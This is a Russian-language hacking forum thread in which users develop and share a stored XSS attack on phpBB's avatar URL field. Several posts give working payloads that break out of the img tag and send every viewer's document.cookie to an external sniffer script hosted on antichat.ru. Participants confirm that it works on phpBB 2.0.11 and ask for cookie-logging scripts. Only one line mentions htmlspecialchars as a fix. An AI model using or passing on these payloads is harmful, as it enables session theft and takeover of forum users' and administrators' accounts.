Форумы XSS в phpBB

йопт!! запарился уже... мож потому и не могу решить проблему, что она слишком легкая
Короче так, на форуме phpBB есть возможность вставлять аватар со своего url , решил проверить на дырочку, и вписал туда javascript:alert();
в ответ получил:
<img src="javascript:alert();" alt="" border="0" />
идем дальше...
решил проверить на окончание *.jpg , вписав x.jpg и получил:
<img src="x.jpg" alt="" border="0" />
затем проверил вписав x.ru x=`x.jpg получил:
<img src="x.ru x=`x.jpg" alt="" border="0" />
и т.п.
Вопрос вот в чем: пишу вместо картинки снифер (http://antichat.ru/cgi-bin/s.jpg) и он прекрасно его ловит, однаком не нужны куки всех, у кого грузится страница с моим аватором, все перепробовал, но нифига не получается Помогите плзз...

 

Приведи код, который ты вставляешь в форум.

 

поэтому и спрашиваю, как код оформить?? Дело в том, что форум съедает любые варианты, т.е. что бы не писалось в поле ссылки на аватар - все будет отображаться как картинка, например:
пишем в поле bla-bla-bla
получится <img src="bla-bla-bla" alt="" border="0" />
пишем javascript:alert(document.cookie)
и при загрузки страницы нам открывается alert окно в котором наши куки, а в html-тегах видим <img src="javascript:alert(document.cookie)" alt="" border="0" />
Словом, все, что бы Мы не писали в графе аватара, форум будет съедать как картинку <img src="наш текст">
Вот Я и спрашиваю, как мне вместо отображения document.cookie у юзера отдать запрос сниферу, что бы он их словил, а у юзера ни чего не отображалось?? Многое пререпробовал, но результат один и тот же - снифер ловит opener.location (url на котором находится юзер), то бишь адрес, откуда был вызван снифер, а не document.cookie - его куки...
Потенциальная дырка есть, но ее нужно оформить!! Есть идеи?!

 

Ура-а-а-а-а-а!!!!!! Решение найдено!!

 

Короче так...
Есть в phpBB такая хреновина, как аватар и там нет фильтра на спец символы, а это нам позволяет делать все, что вздумается Инфы об этом XSS ни где не встречал, поэтому можно считать новой

XSS такой:
http://[target].jpg" style="background:url(javascript:document.images[0].src=/http:xxlocalhostx1.php?/.source.replace(/x/g,String.fromCharCode(47))+document.cookie)
где [target] - url на реальную картинку
localhost - url снифера

В ответ от сервера получаем в html-тегах:
<img src="http://[target].jpg" style="background:url(javascript:document.images[0].src=/http:xxlocalhostx1.php?/.source.replace(/x/g,String.fromCharCode(47))+document.cookie)" alt="" border="0" />

таким образом грузится картинка, не доставляющая жертве (ею может быть админ) ни каких неудобств, в то время как его куки уходят к сниферу

з.ы. кто первый - тот и пускай пишет ролик для видео.античат.ру , тока просьба указать, что эту ни кому не приметную багу нашел zFlex.
С ув., Йа ))

 

Мля мля неработает ...

Как именно вставить в сообщение на форуме эту штуку ??

 

Блин,ты че глупый,какой нафиг сообщение в форуме...это вставляется в АФАТАР!!!т.е. когда регаешься или редактируешь свой акк,там пишешь,где url: http://[target].jpg" style="background:url(javascript:document.images[0].src=/http:xxlocalhostx1.php?/.source.replace(/x/g,String.fromCharCode(47))+document.cookie)?


P.s.: я могу написать видео...

 

Обломчик,на большенстве серверов стоит блок 8)

 

А где скрипт взять, который записывал бы их в отдельное файло ? У меня есть но они неканают или я чё то неправельно делаю....

и ещё

Дак вот как привельно составить эту строчку и почему у меня это дело всё неработает ... ваще Шляпа какая то :|

 

Парни помогите или дайте ссылку на мануал ..... нужно ... или оправте скрипт и ссылку на мыло [email protected] заранее спасибо.

 

Вот пример:

Code:

[COLOR=Yellow]http://www.smailiki.nm.ru/lam/lam4.gif" style="background:url(javascript:document.images[0].src=/http:xxantichat.ruxcgi-binxs.jpg?/.source.replace(/x/g,String.fromCharCode(47))+document.cookie)[/COLOR]

Кто будет писать видео, просьба написать, что уязвимость нашел Mr. Iron (icq # 9170797)
Самое простое решение против этого XSS - это htmlspecialchars()

 

Кстате,под эту уязвимость не попадает Phpbb 2.0.11 ....
если я не прав... заделитесь ссылочкой Icq:937843

 

Тока зря все эти шаманские танцы с .source.replace(/x/g,String.fromCharCode(47))
Это можно сделать намного проще:

Code:

http://www.smailiki.nm.ru/lam/lam4.gif" bb="http://antichat.ru/cgi-bin/s.jpg?" style="background:url(javascript:document.images[0].src=this.bb+document.cookie)

 

урааааааааа Работает даже на версси PHPBB 2.0.11

 

plunul eto:
document.writeln (
"<a target=_blank href='http://ad.strict.tbn.ru/bb.cgi?cmd=go&r=r_ssi" +
"&vbn=353&pac=2836328&pnm=7&bac=69735877&bnm=2&ref=http%3A%2F%2Ftattoo%2Efani%2Eru%2F&loc=&htr=http%3A%2F%2Ftattoo%2Efani%2Eru%2Fgallery%2F'>" +
"<img src='http://195.161.118.159/69735/69735877_2.gif' border=0 width=468 height=60 alt=\"TBN -- The Banner Network\" title=\"TBN -- The Banner Network\"></a>"
);

 

И куда сохраняется файл с Хешами ???

 

Вот вот где путь то на скрип и какой должен быть скрипт ... ??

 

Ой ли. У меня на форуме кавычки спокойно квотируются:
<img src="http://avatar.com/x.jpg&quot; bb=&quot;http://antichat.ru